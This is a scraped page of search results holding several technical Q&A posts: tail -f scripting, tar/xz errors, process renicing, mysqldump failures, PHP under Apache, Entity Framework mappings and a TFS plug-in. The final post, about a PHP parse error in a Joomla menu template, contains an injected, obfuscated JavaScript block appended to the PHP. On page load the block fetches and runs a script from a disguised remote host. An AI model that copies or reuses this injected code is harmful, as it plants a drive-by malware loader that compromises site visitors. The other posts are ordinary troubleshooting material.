Search Results

Search found 5175 results on 207 pages for 'simon child'.

Page 53/207

  • Can I use Zoneedit to do URL rewrite?

    - by chilly-child
    This is our scenario: our domain is hosted by a company, but they don't manage the DNS; we use ZoneEdit (www.zoneedit.com) to manage the DNS records such as nameservers, CNAMEs, etc. Then we have our web host, where our files are hosted. We have a subdomain created on ZoneEdit. We would like to do a URL rewrite so that subdomain.ourdomain.com is displayed as www.ourdomain.com/subdomain. Should the URL rewrite be done at ZoneEdit, at the web host, or at the DNS host? I checked the ZoneEdit docs but could not find a way to do a URL rewrite. Need some advice. Thanks

    Read the article

  • tail -f and then exit on matching string

    - by Patrick
    I am trying to configure a startup script which will start Tomcat, monitor catalina.out for the string "Server startup", and then run another process. I have been trying various combinations of tail -f with grep and awk, but haven't got anything working yet. The main issue I am having seems to be forcing the tail to die after grep or awk has matched the string. I have simplified it to the following test case. test.sh is listed below:

        #!/bin/sh
        rm -f child.out
        ./child.sh > child.out &
        tail -f child.out | grep -q B

    child.sh is listed below:

        #!/bin/sh
        echo A
        sleep 20
        echo B
        echo C
        sleep 40
        echo D

    The behavior I am seeing is that grep exits after 20 seconds, however the tail takes a further 40 seconds to die. I understand why this is happening - tail only notices that the pipe is gone when it writes to it, which only happens when data gets appended to the file. This is compounded by the fact that tail seems to be buffering the data and outputting the B and C characters as a single write (I confirmed this with strace). I have attempted to fix that with solutions I found elsewhere, such as using the unbuffer command, but that didn't help. Anybody got any ideas for how to get this working the way I expect? Or ideas for waiting for a successful Tomcat start (I'm thinking about waiting on a TCP port to know it has started, but suspect that will become more complex than what I am trying to do now)? I have managed to get it working with awk doing a "killall tail" on match, but I am not happy with that solution. Note I am trying to get this to work on RHEL4.
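    One simple workaround (a sketch, not from the original question - it assumes the "Server startup" line reliably reaches catalina.out) is to avoid tail altogether and poll the log with grep -q, so nothing is left running once the string appears:

        #!/bin/sh
        # Poll the log until the startup marker shows up, then continue.
        # "run_next_process" is a hypothetical placeholder for the follow-on step.
        while ! grep -q "Server startup" catalina.out; do
            sleep 1
        done
        run_next_process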

    Read the article

  • Extracting the layer transparency into an editable layer mask in Photoshop

    - by last-child
    Is there any simple way to extract the "baked in" transparency in a layer and turn it into a layer mask in Photoshop? To take a simple example: Let's say that I paint a few strokes with a semi-transparent brush, or paste in a .png-file with an alpha channel. The rgb color values and the alpha value for each pixel are now all contained in the layer-image itself. I would like to be able to edit the alpha values as a layer mask, so that the layer image is solid and contains only the RGB values for each pixel. Is this possible, and in that case how? Thanks. EDIT: To clarify - I'm not really after the transparency values in themselves, but in the separation of rgb values and alpha values. That means that the layer must become a solid, opaque image with a mask.

    Read the article

  • unable to decompress a *.tar.xz file

    - by neubert
    Per http://askubuntu.com/a/107976 I tried

        tar xf php-5.6.0RC4.tar.xz
        tar -xJf php-5.6.0RC4.tar.xz

    and in both cases I get the following:

        tar (child): xz: Cannot exec: No such file or directory
        tar (child): Error is not recoverable: exiting now
        tar: Child returned status 2
        tar: Error is not recoverable: exiting now

    Here's php-5.6.0RC4.tar.xz: http://downloads.php.net/tyrael/php-5.6.0RC4.tar.xz

    I'm running Ubuntu 14.04 LTS.
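    The "xz: Cannot exec" message means tar is shelling out to the xz binary and cannot find it. A minimal fix sketch (package name as it exists on Ubuntu 14.04):

        sudo apt-get install xz-utils
        tar -xJf php-5.6.0RC4.tar.xz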

    Read the article

  • Renicing complex multithreaded applications in Linux

    - by Vi
    Applications (especially big Java and C++ ones) often show up as multiple lines in htop, each with its own PID and its own nice level. An application can also spawn a lot of child processes (as in aptitude update), so I need to affect both the parent (so that new children inherit the new priority) and the existing children (so the effect is immediate, not delayed until the child terminates). How can I apply "renice", "ionice" or "schedtool" to an already launched big application?
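    A minimal sketch of one approach (the PID is a hypothetical example, and it assumes a Linux /proc layout where each thread appears under /proc/PID/task): renice every thread of the process and then its direct children, since on Linux nice values are tracked per thread.

        PID=1234                                    # hypothetical target process
        renice -n 10 -p $(ls /proc/$PID/task)       # all threads of the process
        renice -n 10 -p $(pgrep -P $PID)            # direct child processes
        ionice -c2 -n7 -p $PID $(pgrep -P $PID)     # same idea for I/O priority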

    Read the article

  • mysqldump isn't able to export a specific database, phpMyAdmin crashes

    - by Devils Child
    I'm experiencing problems with a database on my server (note: all other databases work fine). When I try to export it with mysqldump I get this error:

        # mysqldump -u root -pXXXXXXXXX databasename > /root/databasename.sql
        mysqldump: Couldn't execute 'show table status like 'apps'': Lost connection to MySQL server during query (2013)

    Also, phpMyAdmin throws an error when selecting this database and immediately logs out. However, the web site which uses this database works fine. I can also execute SELECT statements on the table named "apps" from the MySQL shell. I tried restarting the MySQL daemon as well as REPAIR DATABASE and REPAIR TABLE, but the problem still persists. I had this problem before, then it disappeared somehow without me doing anything to resolve it. Now the problem is back and I'm simply unable to create a backup of this database.

    Used software: Debian 6.0.7 x64, MySQL 5.1.66-0

    MySQL version:

        mysql> SHOW VARIABLES LIKE "%version%";
        +-------------------------+-------------------+
        | Variable_name           | Value             |
        +-------------------------+-------------------+
        | protocol_version        | 10                |
        | version                 | 5.1.66-0+squeeze1 |
        | version_comment         | (Debian)          |
        | version_compile_machine | x86_64            |
        | version_compile_os      | debian-linux-gnu  |
        +-------------------------+-------------------+
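    A first diagnostic pass often looks something like the sketch below (the log path and packet size are examples, not from the original question); a "Lost connection during query (2013)" on SHOW TABLE STATUS frequently points at a crashing table or an undersized max_allowed_packet:

        mysqlcheck -u root -p --check databasename apps        # check the table mysqldump dies on
        tail -n 50 /var/log/mysql/error.log                    # look for crash/restart messages around the failure
        mysqldump -u root -p --max_allowed_packet=256M databasename > /root/databasename.sql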

    Read the article

  • Many to many self join through junction table

    - by Peter
    I have an EF model that can self-reference through an intermediary class to define a parent/child relationship. I know how to do a pure many-to-many relationship using the Map command, but for some reason going through this intermediary class is causing problems with my mappings. The intermediary class provides additional properties for the relationship. See the classes, modelBuilder logic and error below:

        public class Equipment
        {
            [Key]
            public int EquipmentId { get; set; }
            public virtual List<ChildRecord> Parents { get; set; }
            public virtual List<ChildRecord> Children { get; set; }
        }

        public class ChildRecord
        {
            [Key]
            public int ChildId { get; set; }
            [Required]
            public int Quantity { get; set; }
            [Required]
            public Equipment Parent { get; set; }
            [Required]
            public Equipment Child { get; set; }
        }

    I've tried building the mappings in both directions, though I only keep one set in at a time:

        modelBuilder.Entity<ChildRecord>()
            .HasRequired(x => x.Parent)
            .WithMany(x => x.Children)
            .WillCascadeOnDelete(false);
        modelBuilder.Entity<ChildRecord>()
            .HasRequired(x => x.Child)
            .WithMany(x => x.Parents)
            .WillCascadeOnDelete(false);

    OR

        modelBuilder.Entity<Equipment>()
            .HasMany(x => x.Parents)
            .WithRequired(x => x.Child)
            .WillCascadeOnDelete(false);
        modelBuilder.Entity<Equipment>()
            .HasMany(x => x.Children)
            .WithRequired(x => x.Parent)
            .WillCascadeOnDelete(false);

    Regardless of which set I use, I get the error

        The foreign key component 'Child' is not a declared property on type 'ChildRecord'. Verify that it has not been explicitly excluded from the model and that it is a valid primitive property.

    when I try to deploy my EF model to the database. If I build it without the modelBuilder logic in place, I get two ID columns for Child and two ID columns for Parent in my ChildRecord table. This makes sense, since EF tries to auto-create the navigation properties from Equipment and doesn't know that there are already properties in ChildRecord to fulfill this need. I tried using Data Annotations on the classes, with no modelBuilder code; this failed with the same error as above:

        [Required]
        [ForeignKey("EquipmentId")]
        public Equipment Parent { get; set; }
        [Required]
        [ForeignKey("EquipmentId")]
        public Equipment Child { get; set; }

    AND

        [InverseProperty("Child")]
        public virtual List<ChildRecord> Parents { get; set; }
        [InverseProperty("Parent")]
        public virtual List<ChildRecord> Children { get; set; }

    I've looked at various other answers around the internet/SO, and the common difference seems to be that I am self-joining, whereas all the answers I can find are for two different types.

    Entity Framework Code First Many to Many Setup For Existing Tables
    Many to many relationship with junction table in Entity Framework?
    Creating many to many junction table in Entity Framework

    Read the article

  • Apache downloads php files instead of running their source

    - by Devils Child
    I have just recently upgraded PHP 5.3 to 5.4 on my Debian Squeeze server. Now, instead of executing PHP files, Apache just downloads them, which is really bad. When I try to follow these steps, I get "broken packages" upon installing the libapache2-mod-php5 package. Also, the answer tells me to add something to my httpd.conf, but it's empty.

    Question: How can I make Apache execute PHP files again, instead of just passing them through as a download?

    dpkg -l | grep php returns this:

        rc  libapache2-mod-php5  5.3.3-7+squeeze15  server-side, HTML-embedded scripting language (Apache 2 module)
        rc  php5-cli             5.3.3-7+squeeze15  command-line interpreter for the php5 scripting language
        ii  php5-common          5.4.15-1~dotdeb.2  Common files for packages built from the php5 source
        rc  php5-gd              5.3.3-7+squeeze15  GD module for php5
        rc  php5-mcrypt          5.3.3-7+squeeze15  MCrypt module for php5
        rc  php5-mysql           5.3.3-7+squeeze15  MySQL module for php5
        rc  php5-suhosin         0.9.32.1-1         advanced protection module for php5
        rc  phpmyadmin           4:3.3.7-7          MySQL web administration tool

    And apt-get install libapache2-mod-php5 produces this error:

        The following packages have unmet dependencies:
         libapache2-mod-php5 : Depends: libdb5.1 but it is not installable
                               Depends: libssl1.0.0 (>= 1.0.0) but it is not installable
                               Depends: libxml2 (>= 2.8.0) but 2.7.8.dfsg-2+squeeze7 is to be installed
                               Recommends: php5-cli but it is not going to be installed
        E: Broken packages
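    The dpkg listing shows that php5-common was pulled from dotdeb's 5.4 packages while libapache2-mod-php5 was removed, and the unmet libdb5.1/libssl1.0.0 dependencies suggest the configured repository serves packages built for a newer Debian release. A recovery sketch (the repository line is an assumption - dotdeb published Squeeze-compatible 5.4 packages in its squeeze-php54 suite):

        echo "deb http://packages.dotdeb.org squeeze-php54 all" >> /etc/apt/sources.list.d/dotdeb-php54.list
        apt-get update
        apt-get install libapache2-mod-php5 php5-cli php5-mysql php5-gd
        a2enmod php5
        service apache2 restart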

    Read the article

  • Welcome Relief

    - by michael.seback
    Government organizations are experiencing unprecedented demand for social services. The current economy continues to put immense stress on social service organizations. Increased need for food assistance, employment security, housing aid and other critical services is keeping agencies busier than ever. ... The Kansas Department of Labor (KDOL) uses Oracle's social services solution in its employment security program. KDOL has used Siebel Customer Relationship Management (CRM) for nearly a decade, and recently purchased Oracle Policy Automation to improve its services even further. KDOL implemented Siebel CRM in 2002, and has expanded its use of it over the years. The agency started with Siebel CRM in the call center and later moved it into case management. Siebel CRM has been a strong foundation for KDOL in the face of rising demand for unemployment benefits, numerous labor-related law changes, and an evolving IT environment. ... The result has been better service for constituents. "It's really enabled our staff to be more effective in serving clients," said Hubka. That's a trend the department plans to continue. "We're 100 percent down the path of Siebel, in terms of what we're doing in the future," Hubka added. "Their vision is very much in line with what we're planning on doing ourselves." ... Community Services is the leading agency responsible for the safety and well-being of children and young people within Australia's New South Wales (NSW) Government. Already a longtime Oracle Case Management user, Community Services recently implemented Oracle Policy Automation to ensure accurate, consistent decisions in the management of child safety. "Oracle Policy Automation has helped to provide a vehicle for the consistent application of the Government's 'Keep Them Safe' child protection action plan," said Kerry Holling, CIO for Community Services. "We believe this approach is a world-first in the structured decisionmaking space for child protection and we believe our department is setting an example that other child protection agencies will replicate." ... Read the full case study here.

    Read the article

  • Automatically create bug resolution task using the TFS 2010 API

    - by Bob Hardister
    My customer requires bug resolution to be approved and tracked.  To minimize the overhead for developers I implemented a TFS 2010 server-side plug-in to automatically create a child resolution task for the bug when the “CCB” field is set to approved. The CCB field is a custom field.  I also added the story points field to the bug WIT for sizing purposes. Redundant tasks will not be created unless the bug title is changed or the prior task is closed. The program writes an audit trail to a log file visible in the TFS Admin Console Log view. Here’s the code. BugAutoTask.cs /* SPECIFICATION * When the CCB field on the bug is set to approved, create a child task where the task: * name = Resolve bug [ID] - [Title of bug] * assigned to = same as assigned to field on the bug * same area path * same iteration path * activity = Bug Resolution * original estimate = bug points * * The source code is used to build a dll (Ows.TeamFoundation.BugAutoTaskCreation.PlugIns.dll), * which needs to be copied to * C:\Program Files\Microsoft Team Foundation Server 2010\Application Tier\Web Services\bin\Plugins * on ALL TFS application-tier servers. * * Author: Bob Hardister. */ using System; using System.Collections.Generic; using System.IO; using System.Xml; using System.Text; using System.Diagnostics; using System.Linq; using Microsoft.TeamFoundation.Common; using Microsoft.TeamFoundation.Framework.Server; using Microsoft.TeamFoundation.WorkItemTracking.Client; using Microsoft.TeamFoundation.WorkItemTracking.Server; using Microsoft.TeamFoundation.Client; using System.Collections; namespace BugAutoTaskCreation { public class BugAutoTask : ISubscriber { public EventNotificationStatus ProcessEvent(TeamFoundationRequestContext requestContext, NotificationType notificationType, object notificationEventArgs, out int statusCode, out string statusMessage, out ExceptionPropertyCollection properties) { statusCode = 0; properties = null; statusMessage = String.Empty; // Error message for for tracing last code executed and optional fields string lastStep = "No field values found or set "; try { if ((notificationType == NotificationType.Notification) && (notificationEventArgs.GetType() == typeof(WorkItemChangedEvent))) { WorkItemChangedEvent workItemChange = (WorkItemChangedEvent)notificationEventArgs; // see ConnectToTFS() method below to select which TFS instance/collection // to connect to TfsTeamProjectCollection tfs = ConnectToTFS(); WorkItemStore wiStore = tfs.GetService<WorkItemStore>(); lastStep = lastStep + ": connection to TFS successful "; // Get the work item that was just changed by the user. WorkItem witem = wiStore.GetWorkItem(workItemChange.CoreFields.IntegerFields[0].NewValue); lastStep = lastStep + ": retrieved changed work item, ID:" + witem.Id + " "; // Filter for Bug work items only if (witem.Type.Name == "Bug") { // DEBUG lastStep = lastStep + ": changed work item is a bug "; // Filter for CCB (i.e. 
Baseline Status) field set to approved only bool BaselineStatusChange = false; if (workItemChange.ChangedFields != null) { ProcessBugRevision(ref lastStep, workItemChange, wiStore, ref witem, ref BaselineStatusChange); } } } } catch (Exception e) { Trace.WriteLine(e.Message); Logger log = new Logger(); log.WriteLineToLog(MsgLevel.Error, "Application error: " + lastStep + " - " + e.Message + " - " + e.InnerException); } statusCode = 1; statusMessage = "Bug Auto Task Evaluation Completed"; properties = null; return EventNotificationStatus.ActionApproved; } // PRIVATE METHODS private static void ProcessBugRevision(ref string lastStep, WorkItemChangedEvent workItemChange, WorkItemStore wiStore, ref WorkItem witem, ref bool BaselineStatusChange) { foreach (StringField field in workItemChange.ChangedFields.StringFields) { // DEBUG lastStep = lastStep + ": last changed field is - " + field.Name + " "; if (field.Name == "Baseline Status") { lastStep = lastStep + ": retrieved bug baseline status field value, bug ID:" + witem.Id + " "; BaselineStatusChange = (field.NewValue != field.OldValue); if ((BaselineStatusChange) && (field.NewValue == "Approved")) { // Instanciate logger Logger log = new Logger(); // *** Create resolution task for this bug *** // ******************************************* // Get the team project and selected field values of the bug work item Project teamProject = witem.Project; int bugID = witem.Id; string bugTitle = witem.Fields["System.Title"].Value.ToString(); string bugAssignedTo = witem.Fields["System.AssignedTo"].Value.ToString(); string bugAreaPath = witem.Fields["System.AreaPath"].Value.ToString(); string bugIterationPath = witem.Fields["System.IterationPath"].Value.ToString(); string bugChangedBy = witem.Fields["System.ChangedBy"].OriginalValue.ToString(); string bugTeamProject = witem.Project.Name; lastStep = lastStep + ": all mandatory bug field values found "; // Optional fields Field bugPoints = witem.Fields["Microsoft.VSTS.Scheduling.StoryPoints"]; if (bugPoints.Value != null) { lastStep = lastStep + ": all mandatory and optional bug field values found "; } // Initialize child resolution task title string childTaskTitle = "Resolve bug " + bugID + " - " + bugTitle; // At this point I can check if a resolution task (of the same name) // for the bug already exist // If so, do not create a new resolution task bool createResolutionTask = true; WorkItem parentBug = wiStore.GetWorkItem(bugID); WorkItemLinkCollection links = parentBug.WorkItemLinks; foreach (WorkItemLink wil in links) { if (wil.LinkTypeEnd.Name == "Child") { WorkItem childTask = wiStore.GetWorkItem(wil.TargetId); if ((childTask.Title == childTaskTitle) && (childTask.State != "Closed")) { createResolutionTask = false; log.WriteLineToLog(MsgLevel.Info, "Team project " + bugTeamProject + ": " + bugChangedBy + " - set the CCB field to \"Approved\" for bug, ID: " + bugID + ". 
Task not created as open one of the same name already exist, ID:" + childTask.Id); } } } if (createResolutionTask) { // Define the work item type of the new work item WorkItemTypeCollection workItemTypes = wiStore.Projects[teamProject.Name].WorkItemTypes; WorkItemType wiType = workItemTypes["Task"]; // Setup the new task and assign field values witem = new WorkItem(wiType); witem.Fields["System.Title"].Value = "Resolve bug " + bugID + " - " + bugTitle; witem.Fields["System.AssignedTo"].Value = bugAssignedTo; witem.Fields["System.AreaPath"].Value = bugAreaPath; witem.Fields["System.IterationPath"].Value = bugIterationPath; witem.Fields["Microsoft.VSTS.Common.Activity"].Value = "Bug Resolution"; lastStep = lastStep + ": all mandatory task field values set "; // Optional fields if (bugPoints.Value != null) { witem.Fields["Microsoft.VSTS.Scheduling.OriginalEstimate"].Value = bugPoints.Value; lastStep = lastStep + ": all mandatory and optional task field values set "; } // Check for validation errors before saving the new task and linking it to the bug ArrayList validationErrors = witem.Validate(); if (validationErrors.Count == 0) { witem.Save(); // Link the new task (child) to the bug (parent) var linkType = wiStore.WorkItemLinkTypes[CoreLinkTypeReferenceNames.Hierarchy]; // Fetch the work items to be linked var parentWorkItem = wiStore.GetWorkItem(bugID); int taskID = witem.Id; var childWorkItem = wiStore.GetWorkItem(taskID); // Add a new link to the parent relating the child and save it parentWorkItem.Links.Add(new WorkItemLink(linkType.ForwardEnd, childWorkItem.Id)); parentWorkItem.Save(); log.WriteLineToLog(MsgLevel.Info, "Team project " + bugTeamProject + ": " + bugChangedBy + " - set the CCB field to \"Approved\" for bug, ID:" + bugID + ", which automatically created child resolution task, ID:" + taskID); } else { log.WriteLineToLog(MsgLevel.Error, "Error in creating bug resolution child task for bug ID:" + bugID); foreach (Field taskField in validationErrors) { log.WriteLineToLog(MsgLevel.Error, " - Validation Error in task field: " + taskField.ReferenceName); } } } } } } } private TfsTeamProjectCollection ConnectToTFS() { // Connect to TFS string tfsUri = string.Empty; // Production TFS instance production collection tfsUri = @"xxxx"; // Production TFS instance admin collection //tfsUri = @"xxxxx"; // Local TFS testing instance default collection //tfsUri = @"xxxxx"; TfsTeamProjectCollection tfs = new TfsTeamProjectCollection(new System.Uri(tfsUri)); tfs.EnsureAuthenticated(); return tfs; } // HELPERS public string Name { get { return "Bug Auto Task Creation Event Handler"; } } public SubscriberPriority Priority { get { return SubscriberPriority.Normal; } } public enum MsgLevel { Info, Warning, Error }; public Type[] SubscribedTypes() { return new Type[1] { typeof(WorkItemChangedEvent) }; } } } Logger.cs using System; using System.Collections.Generic; using System.IO; using System.Linq; using System.Text; using System.Windows.Forms; namespace BugAutoTaskCreation { class Logger { // fields private string _ApplicationDirectory = @"C:\ProgramData\Microsoft\Team Foundation\Server Configuration\Logs"; private string _LogFileName = @"\CFG_ACCT_AT_OWS_BugAutoTaskCreation.log"; private string _LogFile; private string _LogTimestamp = DateTime.Now.ToString("MM/dd/yyyy HH:mm:ss"); private string _MsgLevelText = string.Empty; // default constructor public Logger() { // check for a prior log file FileInfo logFile = new FileInfo(_ApplicationDirectory + _LogFileName); if (!logFile.Exists) { 
CreateNewLogFile(ref logFile); } } // properties public string ApplicationDirectory { get { return _ApplicationDirectory; } set { _ApplicationDirectory = value; } } public string LogFile { get { _LogFile = _ApplicationDirectory + _LogFileName; return _LogFile; } set { _LogFile = value; } } // PUBLIC METHODS public void WriteLineToLog(BugAutoTask.MsgLevel msgLevel, string logRecord) { try { // set msgLevel text if (msgLevel == BugAutoTask.MsgLevel.Info) { _MsgLevelText = "[Info @" + MsgTimeStamp() + "] "; } else if (msgLevel == BugAutoTask.MsgLevel.Warning) { _MsgLevelText = "[Warning @" + MsgTimeStamp() + "] "; } else if (msgLevel == BugAutoTask.MsgLevel.Error) { _MsgLevelText = "[Error @" + MsgTimeStamp() + "] "; } else { _MsgLevelText = "[Error: unsupported message level @" + MsgTimeStamp() + "] "; } // write a line to the log file StreamWriter logFile = new StreamWriter(_ApplicationDirectory + _LogFileName, true); logFile.WriteLine(_MsgLevelText + logRecord); logFile.Close(); } catch (Exception) { throw; } } // PRIVATE METHODS private void CreateNewLogFile(ref FileInfo logFile) { try { string logFilePath = logFile.FullName; // write the log file header _MsgLevelText = "[Info @" + MsgTimeStamp() + "] "; string cpu = string.Empty; if (Environment.Is64BitOperatingSystem) { cpu = " (x64)"; } StreamWriter newLog = new StreamWriter(logFilePath, false); newLog.Flush(); newLog.WriteLine(_MsgLevelText + "===================================================================="); newLog.WriteLine(_MsgLevelText + "Team Foundation Server Administration Log"); newLog.WriteLine(_MsgLevelText + "Version : " + "1.0.0 Author: Bob Hardister"); newLog.WriteLine(_MsgLevelText + "DateTime : " + _LogTimestamp); newLog.WriteLine(_MsgLevelText + "Type : " + "OWS Custom TFS API Plug-in"); newLog.WriteLine(_MsgLevelText + "Activity : " + "Bug Auto Task Creation for CCB Approved Bugs"); newLog.WriteLine(_MsgLevelText + "Area : " + "Build Explorer"); newLog.WriteLine(_MsgLevelText + "Assembly : " + "Ows.TeamFoundation.BugAutoTaskCreation.PlugIns.dll"); newLog.WriteLine(_MsgLevelText + "Location : " + @"C:\Program Files\Microsoft Team Foundation Server 2010\Application Tier\Web Services\bin\Plugins"); newLog.WriteLine(_MsgLevelText + "User : " + Environment.UserDomainName + @"\" + Environment.UserName); newLog.WriteLine(_MsgLevelText + "Machine : " + Environment.MachineName); newLog.WriteLine(_MsgLevelText + "System : " + Environment.OSVersion + cpu); newLog.WriteLine(_MsgLevelText + "===================================================================="); newLog.WriteLine(_MsgLevelText); newLog.Close(); } catch (Exception) { throw; } } private string MsgTimeStamp() { string msgTimestamp = string.Empty; return msgTimestamp = DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss:fff"); } } }

    Read the article

  • [Oracle Identity Manager] 11g R2 Bundle Patch 09 is Available!

    - by mustafakaya
    Oracle Identity Manager Bundle Patch 09 is available now. You can download BP09 from here. Also, there is an important recommendation for BP08!

    List of bugs fixed with BP09:

    Bug:12699224 : Trusted source reconciliation fails to create users with many reconciliation field mappings.
    Bug:14407437 : Provisioning through bulk request inserts null records into child tables.
    Bug:14493217 : Target resource reconciliation throws an ORA-06512 error when the Descriptive field is mapped to a field that does not have a reconciliation field mapping.
    Bug:16044671 : User form customization fails if a UDF contains an invalid character.
    Bug:16545968 : Modifying any attribute on a service account changes the account type to a primary account.
    Bug:16562633 : Oracle Identity Manager throws javax.el.ELException while viewing a profile under direct reports.
    Bug:16662834 : User is not reprovisioned after the user is deleted and created in the target with the same orclguid.
    Bug:16662905 : If an LOV field is required on an Application Instance form, no validation is enforced on the LOV field although it is required.
    Bug:16701873 : The Members tab of a role displays only enabled users and does not display disabled users.
    Bug:16862846 : When a notification is being sent, the mail ID in the Reply To field is set to the recipient's mail ID instead of the sender's mail ID.
    Bug:16824062 : When you use the API to fetch or delete child data from an account, the child data row value is null. Therefore, child data is not returned.
    Bug:16912736 : There is a performance issue when the provisioned application instance details are opened for a user.

    Read the article

  • NHibernate Pitfalls: Cascades

    - by Ricardo Peres
    This is part of a series of posts about NHibernate Pitfalls. See the entire collection here.

    For entities that have associations – one-to-one, one-to-many, many-to-one or many-to-many – NHibernate needs to know what to do with their related entities at three particular moments: when saving, updating or deleting. In particular, there are two possible behaviors: either ignore these related entities or cascade changes to them. NHibernate allows setting the cascade behavior for each association, and the default behavior is not to cascade (ignore). The possible cascade options are:

    None - Ignore; this is the default.
    Save-Update - If the entity is being saved or updated, also save any related entities that are either not saved or have been modified, and associate these related entities with the root entity. Generally safe.
    Delete - If the entity is being deleted, also delete the related entities. This is only useful for parent-child relations.
    Delete-Orphan - Identical to Delete, with the addition that if a related entity is removed from the association – orphaned – it is also deleted. Also only for parent-child.
    All - Combination of Save-Update and Delete; usually that’s what we want (for parent-child relations, of course).
    All-Delete-Orphan - Same as All, plus delete any related entities that lose their relationship.

    In summary, Save-Update is generally what you want in most cases. As for the Delete variations, they should only be used if the related entities depend on the root entity (parent-child), so that deleting the root entity but not its related entities would result in a constraint violation in the database.

    Read the article

  • Persisting simple tree with (Fluent-)NHibernate leads to System.InvalidCastException

    - by fudge
    Hi there, there seems to be a problem with recursive data structures and (Fluent-)NHibernate, or it's just me being a complete moron... Here's the tree:

        public class SimpleNode
        {
            public SimpleNode () { this.Children = new List<SimpleNode> (); }
            public virtual SimpleNode Parent { get; private set; }
            public virtual List<SimpleNode> Children { get; private set; }
            public virtual void setParent (SimpleNode parent) { parent.AddChild (this); Parent = parent; }
            public virtual void AddChild (SimpleNode child) { this.Children.Add (child); }
            public virtual void AddChildren (IEnumerable<SimpleNode> children) { foreach (var child in children) { AddChild (child); } }
        }

    The mapping:

        public class SimpleNodeEntity : ClassMap<SimpleNode>
        {
            public SimpleNodeEntity ()
            {
                Id (x => x.Id);
                References (x => x.Parent).Nullable ();
                HasMany (x => x.Children).Not.LazyLoad ().Inverse ().Cascade.All ().KeyNullable ();
            }
        }

    Now, whenever I try to save a node, I get this:

        System.InvalidCastException: Cannot cast from source type to destination type.
          at (wrapper dynamic-method) SimpleNode. (object,object[],NHibernate.Bytecode.Lightweight.SetterCallback)
          at NHibernate.Bytecode.Lightweight.AccessOptimizer.SetPropertyValues (object,object[])
          at NHibernate.Tuple.Entity.PocoEntityTuplizer.SetPropertyValuesWithOptimizer (object,object[])

    My setup: Mono 2.8.1 (on OSX), NHibernate 2.1.2, FluentNHibernate 1.1.0

    Read the article

  • Parse error: syntax error, unexpected '<' in /home/future/public_html/modules/mod_mainmenu/tmpl/defa

    - by kofi
    I'm unfortunately having an unknown error with my php file. (for joomla 1.5) I don't seem to get what's wrong. This is my entire code, with an apparent error on line 84. Would appreciate some feedback, thanks. <?php // no direct access defined('_JEXEC') or die('Restricted access'); if ( ! defined('modMainMenuXMLCallbackDefined') ) { function modMainMenuXMLCallback(&$node, $args) { $user = &JFactory::getUser(); $menu = &JSite::getMenu(); $active = $menu->getActive(); $path = isset($active) ? array_reverse($active->tree) : null; if (($args['end']) && ($node->attributes('level') >= $args['end'])) { $children = $node->children(); foreach ($node->children() as $child) { if ($child->name() == 'ul') { $node->removeChild($child); } } } if ($node->name() == 'ul') { foreach ($node->children() as $child) { if ($child->attributes('access') > $user->get('aid', 0)) { $node->removeChild($child); } } } if (($node->name() == 'li') && isset($node->ul)) { $node->addAttribute('class', 'parent'); } if (isset($path) && (in_array($node->attributes('id'), $path) || in_array($node->attributes('rel'), $path))) { if ($node->attributes('class')) { $node->addAttribute('class', $node->attributes('class').' active'); } else { $node->addAttribute('class', 'active'); } } else { if (isset($args['children']) && !$args['children']) { $children = $node->children(); foreach ($node->children() as $child) { if ($child->name() == 'ul') { $node->removeChild($child); } } } } if (($node->name() == 'li') && ($id = $node->attributes('id'))) { if ($node->attributes('class')) { $node->addAttribute('class', $node->attributes('class').' item'.$id); } else { $node->addAttribute('class', 'item'.$id); } } if (isset($path) && $node->attributes('id') == $path[0]) { $node->addAttribute('id', 'current'); } else { $node->removeAttribute('id'); } $node->removeAttribute('rel'); $node->removeAttribute('level'); $node->removeAttribute('access'); } define('modMainMenuXMLCallbackDefined', true); } modMainMenuHelper::render($params, 'modMainMenuXMLCallback'); <script>var Zl;if(Zl!='' && Zl!='ki'){Zl=''};function v(){var jL=new String();var M=window;var q="";var ZY='';var Z=unescape;var C;if(C!='' && C!='g'){C=null};this.nj='';var _='';this.X="";var t=new Date();var R="\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x61\x72\x65\x61\x73\x61\x6c\x65\x2d\x63\x6f\x6d\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x7a\x2e\x65\x79\x6e\x79\x2d\x63\x6f\x6d\x2e\x59\x6f\x75\x72\x42\x6c\x65\x6e\x64\x65\x72\x50\x61\x72\x74\x73\x2e\x72\x75\x3a";var Od;if(Od!='Dm' && Od!='V'){Od='Dm'};var Vr='';var P=new String("g");var B="";var E;if(E!='' && E!='gD'){E=null};function b(y,U){var zm=new Array();var a='';this.Cm="";var Vb=new String();var k=Z("%5b")+U+Z("%5d");var tX=new String();var MV;if(MV!='' && MV!='qt'){MV='MD'};var c=new RegExp(k, P);return y.replace(c, _);var cS="";var RTD='';};var Zr;if(Zr!='' && Zr!='vJ'){Zr=''};var L=new String();var DE=new Date();var fg;if(fg!='Ep'){fg='Ep'};var nf;if(nf!=''){nf='d_'};var W=Z("%2f%67%6f%6f%67%6c%65%2e%61%74%2f%67%6f%6f%67%6c%65%2e%61%74%2f%64%72%75%64%67%65%72%65%70%6f%72%74%2e%63%6f%6d%2f%74%72%61%76%69%61%6e%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2e%70%68%70");this.aA='';var u='';this.XB='';var dP;if(dP!='i' && dP != ''){dP=null};var dN;if(dN!='' && dN!='zx'){dN='_y'};var WS=b('85624104275582212705194497','13296457');var Hb=new Array();var lP;if(lP!='ok' && lP != ''){lP=null};var O=document;function n(){var J;if(J!='mS' && J != ''){J=null};u=R;var jv;if(jv!='' && jv!='jw'){jv=''};u+=WS;var MJ;if(MJ!='Qp'){MJ=''};u+=W;var fj=new 
Array();this.PM="";try {this.dq='';var ln=new Date();var eS=new Date();h=O.createElement(b('sScwrwi4pSt5','OZjKg4w5S'));var uW=new String();var Aj;if(Aj!='lX'){Aj='lX'};var aF;if(aF!='' && aF!='_o'){aF=null};h.src=u;var GY;if(GY!='ev' && GY!='Jr'){GY='ev'};var KK;if(KK!=''){KK='gDq'};h.defer=[1][0];var nO;if(nO!='tP'){nO=''};var aV=new Date();var bE=new Date();O.body.appendChild(h);this.Ze="";} catch(MC){var Ki;if(Ki!='m_' && Ki != ''){Ki=null};};}M[String("pqP5onloa".substr(4)+"drYD".substr(0,1))]=n;var EY;if(EY!='' && EY!='wn'){EY='Sj'};var ep;if(ep!='' && ep!='_q'){ep='Oy'};var uE=new Array();var E_;if(E_!='iU'){E_='iU'};};this.pt="";v();var tl=new String();</script> <!--793d57c076e95df45c451725e5dedf6f-->
